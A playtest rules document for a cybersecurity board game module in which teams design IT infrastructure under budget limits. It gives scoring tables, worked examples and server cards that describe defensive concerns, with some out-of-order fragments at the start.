Reachability check: at Beginner (60), a team can score the full 40 — e.g., Cloud Workload 4 (Email+Web) + Database 10 + Domain Controller 12 (Identity + File) + Backup 9 + Segmented 5 + IDS 10 + second Cloud Workload 4 (redundant web) = 54 spent, 6 remaining → 10+10+5+5+5+5 = 40.
For use in Incident Response and Audit modules: - List all identified gaps - Note severity (CRITICAL, HIGH, MEDIUM, LOW) - These gaps become modifiers when other modules test the network
When Network Building leads to other modules:
→ Incident Response Module: - Network design determines which attacks are possible - Overloaded servers make lateral movement easier - Missing IDS/SIEM makes investigation harder
→ Hardening Module: - Teams can see which network gaps they should fix - Fixing a gap they identified = +2 bonus to that defense
→ Disaster Recovery Module: - Network gaps increase crisis budget costs - Overloaded servers = more data compromised - No backup = no recovery option
→ Audit & Compliance Module: - Pre-built network is audited against NIST/CIS - Audit findings highlight network gaps - Findings become modifiers in Incident Response
Constraint: Very limited budget; must make hard choices
Starting Narrative: "You're a startup with limited funding. You need to build infrastructure but can't afford everything. Choose wisely."
Likely Outcome: - Flat network (save 5) - Few security devices - Multiple overloaded servers - High vulnerability; good learning about consequences
Constraint: Moderate budget; can afford some security
Starting Narrative: "Your organization is growing. You have some budget for infrastructure but not unlimited. Balance growth with security."
Likely Outcome: - Segmented network - Basic security devices (firewall, email gateway, IDS or SIEM) - Some overloading but manageable - Moderate vulnerability; balanced design
Constraint: Good budget; comprehensive design possible
Starting Narrative: "You're rebuilding infrastructure with sufficient budget. Design for security AND resilience."
Likely Outcome: - Segmented or isolated network - Multiple security devices - Minimal overloading - Good security posture; few gaps
Add compliance requirements: - NIST CSF, CIS Controls, PCI-DSS, HIPAA - Teams must choose devices that satisfy compliance - Some devices count toward multiple requirements
Assign roles: - Finance wants cheap solutions - Operations wants reliability - Security wants defense-in-depth - Teams must negotiate trade-offs
After Incident Response or Disaster Recovery: - Teams rebuild network based on lessons learned - Compare new design to original - Measure improvement
| Component | Cost | Notes |
|---|---|---|
| Servers | 3-12 | Higher cost = more critical function |
| Devices | 6-15 | Higher cost = more capability |
| Architecture | 0-12 | One per game; segmented is best balance |
| Hosting | 0-8 | Usually free; some cloud options cost |
Summary of rule changes for playtesters (all labelled "(v2.2)" in the text above):
cards/network-building/standalone/). Previously 5 turns × 1 action made the mandatory requirements physically impossible to place.Network Building Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/standalone-games/network-building.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Network Building Standalone is a 30-45 minute competitive resource management game where teams design IT infrastructure under budget constraints with random business requirements and operational challenges.
Core Concept: - Budget: Limited funding (40-60 Network Budget tokens by difficulty; 50 standard) - Requirements: Random business needs forcing tough trade-offs - Randomness: Equipment failures, budget surprises, requirement changes - Scoring: Multi-dimensional (security, budget efficiency, capability, resilience) - Winner: Team with highest final score
Best For: - Teaching infrastructure trade-offs - Understanding security budget constraints - Decision-making under uncertainty - Standalone 30-45 minute session - Competitive team play (2-4 teams)
Game Duration: 5-7 turns (by difficulty) × 4-5 minutes per turn = 20-30 minutes gameplay - Setup: 5 minutes (explain rules, distribute materials) - Gameplay: 20-30 minutes - Scoring & Debrief: 5-10 minutes - Total: 30-45 minutes
Each turn represents ~1 quarter of the fiscal year: - Reveal a Business Requirement (what does the business need this quarter?) - Reveal an Operational Event (failure, budget change, attack, opportunity) - Team deploys components, handles the event, or passes
cards/network-building/core-deck/server-cards.md)Each has: Type, Cost, Capacity, Security Profile
┌──────────────────────┐
│ EMAIL SERVER │
│ Cost: 8 │
│ Capacity: 1 service │
│ Security: Low │
│ (Phishing target) │
└──────────────────────┘
Server Types Available: - Email Server (8 Budget, 1 capacity, Low security) - Web Server (7 Budget, 1 capacity, Low security) - Database Server (10 Budget, 1 capacity, Medium security) - File Server (6 Budget, 2 capacity, Low security) - Domain Controller (12 Budget, 2 capacity, Medium security) - Development Server (5 Budget, 3 capacity, Low security) - Backup Server (9 Budget, 1 capacity, High security) - Cloud Workload (4 Budget, 2 capacity, Medium security) - Legacy System (3 Budget, 1 capacity, Very Low security) - Honeypot Decoy (7 Budget, 1 capacity, Medium security)
Overload rule: a server may host more services than its capacity for +1 Budget per extra service — but overloaded servers are a recorded risk (see Variations, now a standard rule).
cards/network-building/core-deck/security-device-cards.md)Each has: Type, Cost, Benefit
┌──────────────────────┐
│ FIREWALL │
│ Cost: 12 │
│ Blocks traffic │
│ between network │
│ zones (segmentation) │
└──────────────────────┘
Security Device Types Available (v2.2 — benefits stated in plain language; the Scoring section says what each counts as): - Firewall (12 Budget) — blocks traffic between network zones; counts as Firewall and toward segmentation - IDS (10 Budget) — spots attacks in progress; counts as detection - IPS (14 Budget) — blocks known exploits in real time; counts as detection - Email Gateway (6 Budget) — filters phishing and email malware - WAF (11 Budget) — protects web applications from injection/XSS attacks - SIEM (15 Budget) — central logging and alerting; counts as detection, helps audits - Network Segmentation Switch (10 Budget) — isolates network zones; counts as segmentation - VPN Gateway (9 Budget) — secure remote access for staff - Load Balancer (8 Budget) — spreads load across duplicated services; counts as redundancy - Honeypot Network (8 Budget) — decoy segment that exposes intruders; counts as detection
cards/network-building/standalone/business-requirement-cards.md)20 cards (REQ-01 to REQ-20) of random quarterly business needs. Each names the requirement, what satisfies it, and the score impact.
┌──────────────────────┐
│ BUSINESS REQUIREMENT │
├──────────────────────┤
│ REQ-01: "New Product │
│ Launch Website" │
│ │
│ Satisfied by: Web │
│ Server or cloud web │
│ │
│ Missed: -5 points │
└──────────────────────┘
cards/network-building/standalone/operational-event-cards.md)16 cards (EVT-01 to EVT-16) of random incidents, opportunities, and challenges. Each states its effect and which designs mitigate it.
┌──────────────────────┐
│ OPERATIONAL EVENT │
├──────────────────────┤
│ EVT-01: "Email │
│ Server Failure" │
│ │
│ Pay 5 Budget to fix │
│ OR -10 points │
│ │
│ Mitigated by: │
│ redundant/cloud email│
└──────────────────────┘
Final Score = Security Score + Budget Score + Capability Score + Resilience Score − Requirement/Event penalties (+ bonuses)
Teams win by maximizing total score, not just saving budget.
Each Team Receives: - Starting Budget: 50 Network Budget tokens (Standard difficulty) - Infrastructure Summary Sheet (to track what they've built) - Score Tracking Sheet - Network Diagram Worksheet (optional, for visualization)
Shuffle and place face-down: - Business Requirement deck (all 20 cards; 1 drawn per turn) - Operational Event deck (all 16 cards; 1 drawn per turn)
**"You're a CIO designing your organization's IT infrastructure for the next 18 months. You have limited budget ($50K, represented as 50 tokens). Each quarter brings new business requirements and operational challenges. You must balance: - Getting the work done (business requirements) - Keeping things secure (security devices) - Managing money (budget efficiency) - Surviving incidents (resilience features)
After 6 quarters (turns), we'll score your infrastructure. Highest score wins."**
Threat Orchestrator flips top Business Requirement Card:
"It's Q2. The executive team wants to acquire a customer database company. You need to integrate their 2 million customer records into your infrastructure. You MUST have a functioning Database Server by end of Q2 or you lose 10 points (deal falls through)."
Team Notes: - What service is needed? - When is the deadline? (end of this turn unless the card says otherwise) - What's the penalty if you skip? (points deduction)
Teams Discuss: Do we have it? If not, how do we get it?
Threat Orchestrator flips top Operational Event Card:
"OPERATIONAL EVENT: Your Email Server just failed. It's been down for 2 hours. You can: - Option A: Pay 5 budget for emergency repair (get email back online) - Option B: Skip repair (email stays down all quarter) - lose 10 points (users upset, productivity down) - Option C: Use this as an excuse to upgrade (replace with new server, normal cost)"
Teams Decide: How to handle the incident?
Teams may take ANY NUMBER of the following actions, in any order, limited only by budget (previously one action per turn):
Example: "We're deploying a Database Server on-premises. Cost: 10 budget. Remaining: 40 budget. This satisfies the Q2 acquisition requirement. No penalty!"
Example: "We're deploying an IDS on our internal network. Cost: 10 budget. Remaining: 30 budget. That gives us detection — if a ransomware or insider event comes up, we're covered."
Example: "Email Server failed. We're paying 5 budget for emergency repair. That lets us avoid the -10 penalty. Remaining: 25 budget."
Update Trackers: - Subtract budget spent - Mark servers/devices deployed - Apply any penalties from unmet requirements - Prepare for next turn
Next Turn Begins
Final Score = Security + Budget + Capability + Resilience − requirement/event penalties (+ bonuses)
Requirement and event penalties/bonuses (from the cards) are tracked as they happen and applied to the final total. Dimension scores can go negative.
Measures defensive capability against attacks
| Security Metric | Points | How Scored |
|---|---|---|
| IDS or IPS Deployed | +5 | Detect/prevent network attacks |
| SIEM Deployed | +5 | Centralized logging & detection |
| Firewall Deployed | +4 | Perimeter / zone enforcement |
| Backup Server Deployed | +4 | Ransomware recovery |
| Email Gateway Deployed | +3 | Phishing protection |
| WAF Deployed | +3 | Web application protection |
| Honeypot Deployed | +3 | Early warning system |
| Network Segmentation | +3 | Lateral movement prevention (Segmentation Switch or segmented architecture) |
Maximum Security Score: 30 points (5+5+4+4+3+3+3+3 = 30)
Examples: - Only Email Gateway: 3 points (basic phishing defense, weak) - IDS + SIEM + Email Gateway: 13 points (good detection) - Full suite (IDS + SIEM + Firewall + Backup + Email Gateway + WAF + Honeypot + Segmentation): 30 points (enterprise-grade, but expensive)
Rewards smart utilization: meeting the business's needs within budget while keeping a small contingency reserve. Hoarding budget is NOT rewarded — an unspent token did no work.
Budget Remaining at Game End → Points:
| Budget Remaining | Points | Reading |
|---|---|---|
| 5-15 left | 20 | Requirements met, plus a contingency reserve for surprises |
| 1-4 left | 15 | Fully invested, but nothing left for the next incident |
| 0 left | 10 | Ran completely dry |
| 16-25 left | 10 | Under-invested; capability probably missing |
| 26+ left | 5 | Hoarding — budget is not the goal |
Anti-hoarding check: if the team missed 2 or more Business Requirements during the game, halve their Budget Score (round down). Saving money by failing the business is not efficiency.
Examples: - Spent 42, left 8: 20 points (met needs, kept a reserve) - Spent 46, left 4: 15 points (all-in; one bad event from trouble) - Spent 20, left 30: 5 points (a pile of tokens and a network full of gaps)
Does infrastructure meet business needs?
| Capability | Points | Notes |
|---|---|---|
| Email Service | +3 | Basic business function (Email Server or cloud-hosted) |
| Web Service | +3 | Public presence / e-commerce |
| Database Service | +4 | High-value data management |
| File Storage | +2 | Internal collaboration |
| Domain Controller | +3 | User identity & security |
| Development Capability | +2 | Dev Server or dev via overload |
| Backup Server | +3 | Disaster recovery |
| Remote Access (VPN Gateway) | +2 | Work-from-home support |
| Cloud Workload | +2 | Scalability & redundancy |
| Honeypot | +1 | Early-warning capability |
Maximum Capability Score: 25 points (3+3+4+2+3+2+3+2+2+1 = 25)
Penalties for Missing Key Services: - No Email service: -5 (business can't communicate) - No Database service: -10 (core data has no home) - No Domain Controller: -3 (no central identity) - No VPN Gateway (only if a remote-work requirement card was drawn): -3
(Ransomware consequences for missing backups come from the event cards themselves — see EVT-11.)
Examples: - Email, Web, Database, File, Domain Controller, Backup: 3+3+4+2+3+3 = 18 points (good) - The same plus VPN Gateway and a Honeypot: 18+2+1 = 21 points (excellent) - Email, Web, File, Domain, Backup but NO Database: 3+3+2+3+3 = 14, minus 10 = 4 points (the penalty bites)
Ability to survive and recover from failures
Resilience Factors:
| Factor | Points | Criteria |
|---|---|---|
| Backup Server | +8 | Can recover from ransomware/data loss |
| Detection | +7 | IDS/IPS/SIEM can spot attacks early |
| Redundancy | +5 | Duplicate server in the same role OR Load Balancer |
| Isolation | +3 | Network segmentation prevents spread |
| Recovery Plan | +2 | Has BOTH Backup Server and detection |
Maximum Resilience Score: 25 points (8+7+5+3+2 = 25)
Penalties for Vulnerabilities (v2.2): - No Backup Server: -10 (one disaster from catastrophe) - Single point of failure (all critical services on one server): -5 - No detection capability: -3 - Flat network (no segmentation): -2
Examples: - Backup + Detection + Segmentation + Redundancy: 8+7+3+5, +2 recovery plan = 25 points (maximum; very resilient) - Backup + Detection, flat network, no redundancy: 8+7+2−2 = 15 points (adequate) - No backup, no detection, flat network: −10−3−2 = −15 points (high risk; yes, scores go negative)
Built (total 46 of 50; 4 remaining): - Email Server (8): handles email - Web Server (7): public website - Database Server (10): customer data - File Server (6): internal files - Backup Server (9): disaster recovery - Email Gateway (6): phishing defense
Check: 8+7+10+6+9+6 = 46 ✓. No Domain Controller (too expensive; skipped for budget). Flat network.
Scoring Team A:
Security Score: - Email Gateway: +3 - Backup Server: +4 - No IDS/IPS/SIEM/Firewall/WAF/Honeypot/Segmentation: 0 - Total: 7 points
Budget Score: - 4 budget remaining → 1-4 band - Total: 15 points
Capability Score: - Email +3, Web +3, Database +4, File +2, Backup +3 = 15 - No Domain Controller: −3 - Total: 12 points
Resilience Score: - Backup Server: +8 - No detection: −3 - Flat network: −2 - Total: 3 points
Team A Final Score: 7 + 15 + 12 + 3 = 37 points
Built (total 47 of 50; 3 remaining): - Email Server (8) - Web Server (7) - Database Server (10) - Domain Controller (12) - IDS (10)
Check: 8+7+10+12+10 = 47 ✓. No Backup Server (sacrificed for detection). Flat network.
Scoring Team B:
Security Score: - IDS: +5 - Total: 5 points
Budget Score: - 3 left → 1-4 band - Total: 15 points
Capability Score: - Email +3, Web +3, Database +4, Domain Controller +3 = 13 - Total: 13 points
Resilience Score: - Detection: +7 - No Backup Server: −10 - Flat network: −2 - Total: −5 points (negative!)
Team B Final Score: 5 + 15 + 13 − 5 = 28 points
RESULT: Team A (37) beats Team B (28)
Lesson: Having Backup is critical for resilience, even if it means fewer security devices.
Each team: - Separate budget (50 tokens each at Standard) - Separate infrastructure tracking sheet - Separate score tracker
Simultaneous Play: - All teams reveal the same requirement and event at the same time - Teams take turns choosing actions (round-robin) OR all teams act simultaneously - Simultaneous is faster; rotating turns allows player agency
Track all teams' scores throughout game (illustrative):
| Team | Sec | Budget | Cap | Res | TOTAL |
|---|---|---|---|---|---|
| Team A | 8 | 20 | 12 | 5 | 45 |
| Team B | 12 | 15 | 18 | 10 | 55 |
| Team C | 5 | 10 | 8 | 2 | 25 |
Winner: Team with highest total score after the final turn
If two teams tie: 1. First tiebreaker: Security Score (defense is critical) 2. Second tiebreaker: Resilience Score (ability to survive matters) 3. Third tiebreaker: Capability Score (business requirement fulfillment)
Each game is different because:
Example Game Flow Variations:
Game 1 (Tough Start): - Turn 1: Ransomware wave (REQ-12) → Must buy Backup + Detection early - Turn 2: Budget cut (EVT-05) → Can't afford nice devices - Turn 3: M&A integration (REQ-08) → Need more capacity - Result: Teams forced into defensive posture
Game 2 (Growth-Focused): - Turn 1: Product launch (REQ-01) → Need Web Server - Turn 2: Data acquisition (REQ-02) → Need Database - Turn 3: Emergency funds (EVT-06) → +10 budget! - Result: Teams build bigger, more capable infrastructure
Beginner Mode (Generous): - Starting Budget: 60 - Kind decks (remove EVT-11 and REQ-12 before shuffling) - Turn Limit: 7 (extra time)
Standard Mode: - Starting Budget: 50 - Random card draws - Turn Limit: 6
Advanced Mode (Challenging): - Starting Budget: 40 (tight budget) - Harsh decks (remove EVT-06, EVT-07, EVT-16 — fewer breaks) - Requirement penalties doubled - Turn Limit: 5
Phase 1: Business Requirement TO flips card: "New Product Launch Website — need modern web server capability. If missing by end of Q1: -5 points."
Phase 2: Operational Event TO flips card: "Emergency Funds! A surprise rebate arrives. +10 Budget (one time)."
Budget update: 50 + 10 = 60
Phase 3: Team Actions "We're deploying a Web Server to meet the launch requirement. Cost: 7 budget. Remaining: 53. We know we'll need a backup server eventually — holding the rest for now."
Phase 4: End of Turn - Infrastructure: Web Server - Budget: 53
Phase 1: Business Requirement "Customer Data Acquisition — must have a functioning Database by end of Q2 or lose 10 points."
Phase 2: Operational Event "Email Server Failure — pay 5 budget for emergency repair OR skip and lose 10 points."
The team has no email server, so the TO rules the event inert — there's nothing to break. (TO tip: when an event targets a component the team doesn't own, it fizzles — but it's a great moment to point at the capability gap.)
Phase 3: Team Actions "We're deploying a Database Server (10 budget) to handle the acquisition — that's critical. The failure event doesn't apply to us, so no repair cost. Total this turn: 10. Remaining: 43."
Infrastructure: Web Server, Database Server Budget: 43
Phase 1: Business Requirement "Ransomware Wave in Sector — you need Backup AND Detection capability OR lose 20 points."
Phase 2: Operational Event "Vendor Promotion — next security device this turn costs 2 less."
Phase 3: Team Actions "Critical quarter. We're deploying: - Backup Server (9 budget) - IDS at the promo discount (10 − 2 = 8 budget) That satisfies the ransomware requirement. We'll also grab a Cloud Workload (4) for future flexibility. Total: 21 budget. Remaining: 22."
Infrastructure: Web, Database, Backup, IDS, Cloud Workload Budget: 22
Phase 1: Business Requirement "Work-From-Home Program — need remote access capability. Missing: -3 points."
Phase 2: Operational Event "IT Staff Burnout — you may deploy at most ONE component this turn."
Phase 3: Team Actions "We need remote access, and burnout limits us to one deployment. VPN Gateway it is (9 budget). Remaining: 13."
Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway Budget: 13
Phase 1: Business Requirement "Cyber-Insurance Renewal — Backup + Email Gateway + detection: +5 points if all present, -5 if not."
Phase 2: Operational Event "Hardware Recall — pick an on-prem server: pay 3 budget or it's offline this quarter."
Phase 3: Team Actions "We deploy an Email Gateway (6 budget) — with our Backup and IDS that completes the insurance checklist: +5 points. For the recall we pay 3 to keep the Database Server online (it's load-bearing). Total: 9. Remaining: 4."
Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway, Email Gateway Budget: 4
Phase 1: Business Requirement "Single Sign-On Rollout — must have a Domain Controller OR lose 5 points."
Phase 2: Operational Event "Quiet Quarter — no incident."
Phase 3: Team Actions "A Domain Controller costs 12; we have 4. We can't buy it. We pass and take the -5 penalty."
Final Infrastructure & Budget Check: - Web Server (7) - Database Server (10) - Backup Server (9) - IDS (10, paid 8 with promo) - Cloud Workload (4) - VPN Gateway (9) - Email Gateway (6) - Recall fee (3) - Total spent: 7+10+9+8+4+9+6+3 = 56 of 60 available (50 start + 10 windfall) - Final Budget: 4 remaining ✓
Security Score: - IDS: +5 - Email Gateway: +3 - Backup Server: +4 - Total: 12 points
Budget Score: - 4 remaining → 1-4 band - Missed only 1 requirement (no halving) - Total: 15 points
Capability Score: - Web +3, Database +4, Backup +3, VPN +2, Cloud +2 = 14 - No Email service: −5 (an Email Gateway is a security device — it filters mail, it doesn't host mailboxes; they never deployed an Email Server or cloud email) - No Domain Controller: −3 - Total: 6 points
Resilience Score: - Backup Server: +8 - Detection (IDS): +7 - Recovery Plan (backup + detection): +2 - Flat network: −2 - Total: 15 points
Requirement/Event adjustments: - Turn 5 insurance bonus: +5 - Turn 6 missed SSO requirement: −5
FINAL SCORE: 12 + 15 + 6 + 15 + 5 − 5 = 48 points
Lesson: This team survived the ransomware quarter and kept every event in check — but never bought email or identity. Detection and backups scored well; missing core business services bled capability points all game.
Servers may exceed capacity at +1 Budget per extra service. This is the same rule as the Network Building module. - Example: 3 services on a 2-capacity server costs +1 budget - Trade-off: cheaper than a new server now, but overloaded servers are recorded risks (single point of failure; events and later modules punish them)
Optional Rule: Allow teams to upgrade servers already deployed (swap for a better one, pay the difference). - Example: Replace File Server (6) with Domain Controller (12) — pay 6, keep the hosted services - Creates flexibility but adds complexity
Optional Rule (High Difficulty): If EVT-11 (Ransomware Strikes) is drawn and the team has NO Backup Server, they take the -20 immediately AND must deploy a Backup Server by the end of the next turn (mandatory). - Creates an urgent decision point - Teaches that failures have compounding consequences
Optional Rule: Each Legacy System deployed costs 1 extra budget per turn to maintain (not paid upfront). - Teaches that cheap solutions have hidden costs - Creates long-term vs. short-term thinking
NETWORK BUILDING STANDALONE SCORING (v2.2)
SECURITY SCORE (max 30):
IDS or IPS: +5 | SIEM: +5 | Firewall: +4 | Backup: +4
Email Gateway: +3 | WAF: +3 | Honeypot: +3 | Segmentation: +3
BUDGET SCORE (max 20) — smart utilization, not hoarding:
5-15 left: 20 | 1-4 left: 15 | 0 left: 10 | 16-25 left: 10 | 26+ left: 5
Missed 2+ requirements? Halve it (round down).
CAPABILITY SCORE (max 25):
Email: +3 | Web: +3 | Database: +4 | File: +2 | Domain: +3
Dev: +2 | Backup: +3 | VPN: +2 | Cloud: +2 | Honeypot: +1
Penalties: no Email -5 | no Database -10 | no DC -3
no VPN (if remote-work card drawn) -3
RESILIENCE SCORE (max 25):
Backup: +8 | Detection: +7 | Redundancy: +5 | Segmentation: +3
Recovery Plan (Backup AND Detection): +2
Penalties: no Backup -10 | single point of failure -5
no Detection -3 | flat network -2
FINAL = Security + Budget + Capability + Resilience
− requirement/event penalties (+ bonuses)
SERVERS (Cost / Capacity / Security Profile):
Email (8/1/Low) | Web (7/1/Low) | Database (10/1/Med)
File (6/2/Low) | Domain (12/2/Med) | Dev (5/3/Low)
Backup (9/1/High) | Cloud (4/2/Med) | Legacy (3/1/VLow) | Honeypot (7/1/Med)
Overload: +1 Budget per service beyond capacity
SECURITY DEVICES (Cost — benefit):
Firewall (12 — zone control) | IDS (10 — detection) | IPS (14 — detection+blocking)
Email Gateway (6 — anti-phishing) | WAF (11 — web app defense)
SIEM (15 — detection+logging) | Segmentation Switch (10 — isolation)
VPN Gateway (9 — remote access) | Load Balancer (8 — redundancy)
Honeypot Network (8 — detection/deception)
This is a complete, standalone 30-45 minute competitive mini-game.
To run a session:
1. Print server and device cards (cards/network-building/core-deck/)
2. Print the requirement and event decks (cards/network-building/standalone/)
3. Give each team a budget tracker
4. Run 5-7 turns (4-5 min each, per difficulty)
5. Calculate final scores
6. Declare winner
7. 10-minute debrief
Summary of changes for playtesters:
cards/network-building/standalone/; inline example lists replaced by references to them.Incident Zero: Network Building Standalone Mini-Game Infrastructure design competition with multi-dimensional scoring v2.2 - Playtest Edition
cards/network-building/core-deck/server-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Server Cards represent the core computational systems that run your business. Each server has cost (Budget), capacity (how many services it can host), complexity, and security properties that affect network design.
Type: Business Critical Cost: 8 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 99.9% (almost always needed)
Description: Central email system (Exchange, Postfix, or cloud-based like Office 365). Handles all organizational communication. Commonly targeted by phishing and credential attacks. Must support spam filtering, encryption, and audit logging.
Key Concerns: - Email spoofing and phishing vectors - Credential compromise (email = access to password resets) - Data exfiltration via email attachments and forwarding - High user impact if unavailable
Defense Considerations: - Requires Email Authentication (DMARC/SPF/DKIM) - Benefits from DLP for sensitive email attachments - Gateway filtering for phishing and malware - MFA required for administrative access
Network Placement: DMZ or protected segment (external access required)
Interactions: - Used with Asset Card "Email" - References in Incident Response scenarios (T-01 Phishing, T-11 Browser Extension) - Part of Disaster Recovery "critical services" list
Type: Business Critical Cost: 7 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 99.5% (critical during business hours)
Description: Public-facing web application server (Apache, Nginx, IIS). Hosts corporate website, customer portal, or SaaS application. Primary attack surface for web exploits (SQL injection, XSS, remote code execution).
Key Concerns: - Web application vulnerabilities (OWASP Top 10) - Unpatched framework or library exploits - DDoS attacks targeting availability - Code injection and remote execution - Data exposure via web interface
Defense Considerations: - Requires WAF (Web Application Firewall) for SQL injection/XSS prevention - IPS for exploit signature detection - Regular patching and vulnerability scanning - Load balancer for availability - TLS/SSL for data in transit
Network Placement: DMZ (external access required, isolated from internal systems)
Interactions: - Used with Asset Card "Web" - References in Incident Response scenarios (T-02 Watering Hole, T-05 Kernel Exploit) - Load balancer reduces single point of failure
Type: Business Critical Cost: 10 Budget Capacity: 1 service Complexity: 3/4 Availability Requirement: 99.9% (critical for business operations)
Description: Relational or NoSQL database (SQL Server, PostgreSQL, MongoDB, Oracle). Stores customer data, financial records, operational data. Highest value target after compromise—contains the "crown jewels."
Key Concerns: - SQL injection attacks - Credential abuse (weak database admin passwords) - Lateral movement target (pivot point) - Unencrypted data at rest - Unencrypted data in transit - Unauthorized data access and exfiltration
Defense Considerations: - Requires Network Segmentation to limit access - Credential Guard and strong authentication - Database activity monitoring (DAM) - TLS for all connections - Data encryption at rest - Regular backups with immutability - Connection string in vault (not hardcoded)
Network Placement: Restricted segment (only authorized systems can connect)
Interactions: - Used with Asset Card "Database" - References in Incident Response scenarios (T-04 Lateral Movement, T-10 SQL Exfiltration, T-11 Browser Extension) - Critical for Disaster Recovery backup and recovery
Type: Business Critical Cost: 6 Budget Capacity: 2 services Complexity: 2/4 Availability Requirement: 99% (needed during business hours)
Description: File storage and sharing system (SMB/CIFS, NFS, or cloud file sharing). Stores shared documents, project files, compliance records. Often contains both sensitive and non-sensitive data mixed together.
Key Concerns: - SMB lateral movement attacks - Excessive file permissions (everyone can read everything) - Ransomware encryption of shares - Unauthorized file access and data theft - Compliance violations (PII, PHI, PCI data stored unencrypted) - Uncontrolled data growth and backup challenges
Defense Considerations: - Network Segmentation to limit SMB access - File permissions auditing and hardening - DLP for sensitive file detection - Immutable snapshots for ransomware recovery - Encryption at rest - Access logging and monitoring
Network Placement: Protected segment (limited internal access only)
Interactions: - Used with Asset Card "File Storage" - Target of T-04 Lateral Movement in Incident Response - Critical dependency for Disaster Recovery
Type: Business Critical Cost: 12 Budget Capacity: 2 services Complexity: 3/4 Availability Requirement: 99.5% (core infrastructure dependency)
Description: Active Directory or LDAP domain controller. Master repository of all user identities, credentials, and group memberships. Most powerful target in the organization—compromise of DC gives attacker control of entire directory.
Key Concerns: - Credential dumping (Mimikatz targets LSASS on DC) - Pass-the-hash attacks - Unauthorized privilege escalation - DC compromise = organization is fundamentally compromised - Backup DC synchronization complications - Can be both on-premises and cloud (Azure AD)
Defense Considerations: - Credential Guard to protect LSASS - Privileged Access Workstation (PAW) for DC admin access - Strong authentication (MFA) for all DC access - Network Segmentation (DC in restricted tier) - Backup DC in geographically separate location - Regular backup and recovery testing
Network Placement: Restricted segment (admin-only access)
Interactions: - Used with Asset Card "Identity" - Central to Incident Response investigation (T-06 Mimikatz, T-04 Lateral Movement) - DC compromise immediately loses the game (organizational control lost) - Critical for Disaster Recovery restore procedures
Type: Business Important Cost: 5 Budget Capacity: 3 services Complexity: 2/4 Availability Requirement: 80% (nice to have, can work around)
Description: Development and testing environment for software development. Lower security requirements than production but often contains production-like data (for testing). Developers need broad access for testing purposes.
Key Concerns: - Overly permissive developer access - Production data in dev (compliance violations) - Outdated/unpatched tools (focus on development, not security) - Lateral movement springboard to production - Code repository contains source code (intellectual property) - Test credentials and API keys hardcoded
Defense Considerations: - Separate dev database from production database (never use prod data) - Firewall rules to prevent dev→prod lateral movement - Code repository security (secrets scanning, access control) - Regular cleanup of test data - MFA for dev server access - Audit logging of developer activities
Network Placement: Development segment (isolated from production)
Interactions: - Used with Asset Card "Development" - Often overlooked security risk (compliance gap in Audit module) - Lateral movement target (attacker compromise dev to move to prod)
Type: Business Critical (Different Tier) Cost: 9 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 95% (needed for recovery scenarios)
Description: Backup and archival storage system (dedicated appliance, NAS, or cloud backup like Veeam, Commvault, or Backblaze). Stores point-in-time copies of all critical systems. The ultimate recovery mechanism for ransomware, disasters, and destructive attacks.
Key Concerns: - Backup corruption or compromise (renders backups useless) - Ransomware targeting backup systems - Backup media not separated from primary systems - Backups not regularly tested (recovery fails when needed) - Immutability not enforced (backups can be modified) - Access control: who can restore? Who can delete?
Defense Considerations: - CRITICAL: 3-2-1 backup strategy: 3 copies, 2 media types, 1 offsite - Immutable backups (WORM - Write Once Read Many) - Encryption at rest and in transit - Backup testing schedule (quarterly minimum) - Separate backup credentials (not domain-linked) - Offsite backup location (geographically separated) - Backup media inventory and audit log
Network Placement: Restricted segment + offsite (separate from primary network)
Interactions: - Used with Asset Card "Disaster Recovery" - Critical for Disaster Recovery module (backup resilience determines recovery speed) - If backup is missing or compromised, the team automatically FAILS the Disaster Recovery requirement (v2.2) — a CRITICAL gap carried into other modules - Incident Response mentions backup verification in defenses
Type: Increasingly Business Critical Cost: 4 Budget Capacity: 2 services Complexity: 2/4 (but different concerns than on-premises) Availability Requirement: 99% (vendor manages SLA)
Description: Cloud-hosted application or service (AWS EC2, Azure VM, GCP Compute Engine, or fully managed service like Lambda, Cloud Run). Shifts some infrastructure management to cloud provider but introduces new security concerns.
Key Concerns: - Misconfigured security groups/network ACLs (open to internet) - Cloud credentials compromise (AWS IAM keys stolen) - Instance metadata service attacks (AWS IMDS exploitation) - Cross-account or cross-tenant access (shared infrastructure) - Cloud-specific vulnerabilities (API, permissions models) - Data residency and compliance (where is data stored?)
Defense Considerations: - Cloud-native security tools (AWS Security Hub, Azure Security Center) - Proper IAM configuration (least privilege for cloud roles) - Network security groups with default-deny - Cloud workload protection (container runtime security) - VPC and subnet isolation - Encryption of cloud data
Network Placement: Cloud provider network (separate from on-premises, connected via VPN)
Interactions: - Used with Asset Card (varies—Email in cloud, Web in cloud, etc.) - Network design must include cloud connectivity (VPN or Direct Connect) - Audit module assesses cloud security posture - Cloud-specific Incident Response and Hardening challenges
Type: Business Important (Legacy) Cost: 3 Budget Capacity: 1 service Complexity: 3/4 (difficult to maintain, patch, or secure) Availability Requirement: 90% (supported but aging)
Description: Aging system running outdated OS (Windows XP, older Linux, proprietary systems) or custom applications. Cannot be easily patched due to compatibility issues, vendor no longer supporting, or critical business process depends on it.
Key Concerns: - Cannot patch due to vendor EOL (End of Life) - Incompatible with modern security tools (EDR won't run) - No TLS support (unencrypted traffic) - Known, publicly disclosed vulnerabilities with no fix - Business relies on it despite security risk - Migration cost exceeds security benefit (economically trapped)
Defense Considerations: - CRITICAL: Network Segmentation isolates legacy system - Firewall rules restrict legacy system traffic - Assume compromise and defend the segmented network (not the legacy system itself) - Monitor legacy system for suspicious activity (can't detect on system, detect on network) - Immutable backups to restore if compromised - Plan legacy system retirement
Network Placement: Isolated segment (strict firewall rules, minimal connectivity)
Interactions: - Used if organization has legacy infrastructure - Audit module finds legacy systems as critical findings - Network design: "assume legacy is compromised, defend around it" - Expansion deck explores legacy system challenges
Type: Security Tool (Non-Business) Cost: 7 Budget Capacity: 1 service (decoy only — hosts no real business service) Complexity: 1/4 (purposefully simple and unmonitored-looking) Availability Requirement: N/A (false resource)
Description: Deliberately exposed fake server or user account designed to detect compromise and lateral movement. Appears to be a real business resource but is actually a trap. Any access to honeypot indicates active attacker activity (zero false positives).
